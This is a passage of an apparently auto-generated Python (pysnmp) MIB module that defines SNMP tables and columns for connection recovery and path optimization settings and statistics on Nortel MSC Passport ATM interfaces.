MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2))\nmscAtmIfVpcSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1), )\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRowStatusTable.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVpcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmNetworkingMIB\", \"mscAtmIfVpcSrcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVpcSrcEbrOvIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRowStatusEntry.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 1), RowStatus()).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRowStatus.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvComponentName.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvStorageType.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvIndex.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20), )\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvProvTable.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVpcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmNetworkingMIB\", \"mscAtmIfVpcSrcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVpcSrcEbrOvIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvProvEntry.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1))).clone('yes')).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1))).clone('yes')).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVpcEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11))\nmscAtmIfVpcEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1), )\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRowStatusTable.setStatus('mandatory')\nmscAtmIfVpcEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVpcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVpcEbrInfoIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRowStatusEntry.setStatus('mandatory')\nmscAtmIfVpcEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 1), RowStatus()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRowStatus.setStatus('mandatory')\nmscAtmIfVpcEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoComponentName.setStatus('mandatory')\nmscAtmIfVpcEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoStorageType.setStatus('mandatory')\nmscAtmIfVpcEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoIndex.setStatus('mandatory')\nmscAtmIfVpcEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30), )\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoOperTable.setStatus('mandatory')\nmscAtmIfVpcEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVpcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVpcEbrInfoIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoOperEntry.setStatus('mandatory')\nmscAtmIfVpcEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1)))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVpcEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1)))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVpcEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1)))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoConnectionRecovered.setStatus('mandatory')\nmscAtmIfVpcEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40), )\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoStatsTable.setStatus('mandatory')\nmscAtmIfVpcEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVpcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVpcEbrInfoIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoStatsEntry.setStatus('mandatory')\nmscAtmIfVpcEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40, 1, 1), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVpcEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40, 1, 2), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVpcEbrInfoTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2))\nmscAtmIfVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1), )\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRowStatusTable.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmNetworkingMIB\", \"mscAtmIfVccSrcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVccSrcEbrOvIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRowStatusEntry.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRowStatus.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvComponentName.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvStorageType.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvIndex.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20), )\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvProvTable.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmNetworkingMIB\", \"mscAtmIfVccSrcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVccSrcEbrOvIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvProvEntry.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1))).clone('yes')).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1))).clone('yes')).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12))\nmscAtmIfVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1), )\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoRowStatusTable.setStatus('mandatory')\nmscAtmIfVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVccEbrInfoIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoRowStatusEntry.setStatus('mandatory')\nmscAtmIfVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 1), RowStatus()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoRowStatus.setStatus('mandatory')\nmscAtmIfVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoComponentName.setStatus('mandatory')\nmscAtmIfVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoStorageType.setStatus('mandatory')\nmscAtmIfVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoIndex.setStatus('mandatory')\nmscAtmIfVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30), )\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoOperTable.setStatus('mandatory')\nmscAtmIfVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVccEbrInfoIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoOperEntry.setStatus('mandatory')\nmscAtmIfVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1)))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1)))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1)))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoConnectionRecovered.setStatus('mandatory')\nmscAtmIfVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40), )\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoStatsTable.setStatus('mandatory')\nmscAtmIfVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVccEbrInfoIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoStatsEntry.setStatus('mandatory')\nmscAtmIfVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40, 1, 1), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40, 1, 2), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7))\nmscAtmIfUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1), )\nif mibBuilder.loadTexts: mscAtmIfUniEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmUniMIB\", \"mscAtmIfUniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfUniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfUniEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrRowStatus.setStatus('mandatory')\nmscAtmIfUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrComponentName.setStatus('mandatory')\nmscAtmIfUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrStorageType.setStatus('mandatory')\nmscAtmIfUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfUniEbrIndex.setStatus('mandatory')\nmscAtmIfUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20), )\nif mibBuilder.loadTexts: mscAtmIfUniEbrProvTable.setStatus('mandatory')\nmscAtmIfUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmUniMIB\", \"mscAtmIfUniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfUniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfUniEbrProvEntry.setStatus('mandatory')\nmscAtmIfUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrPathOptimization.setStatus('mandatory')\nmscAtmIfUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30), )\nif mibBuilder.loadTexts: mscAtmIfUniEbrOperTable.setStatus('mandatory')\nmscAtmIfUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmUniMIB\", \"mscAtmIfUniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfUniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfUniEbrOperEntry.setStatus('mandatory')\nmscAtmIfUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40), )\nif mibBuilder.loadTexts: mscAtmIfUniEbrStatsTable.setStatus('mandatory')\nmscAtmIfUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmUniMIB\", \"mscAtmIfUniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfUniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfUniEbrStatsEntry.setStatus('mandatory')\nmscAtmIfUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1, 1), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1, 2), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7))\nmscAtmIfIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1), )\nif mibBuilder.loadTexts: mscAtmIfIispEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmIispMIB\", \"mscAtmIfIispIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfIispEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfIispEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrRowStatus.setStatus('mandatory')\nmscAtmIfIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrComponentName.setStatus('mandatory')\nmscAtmIfIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrStorageType.setStatus('mandatory')\nmscAtmIfIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfIispEbrIndex.setStatus('mandatory')\nmscAtmIfIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20), )\nif mibBuilder.loadTexts: mscAtmIfIispEbrProvTable.setStatus('mandatory')\nmscAtmIfIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmIispMIB\", \"mscAtmIfIispIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfIispEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfIispEbrProvEntry.setStatus('mandatory')\nmscAtmIfIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1, 2), 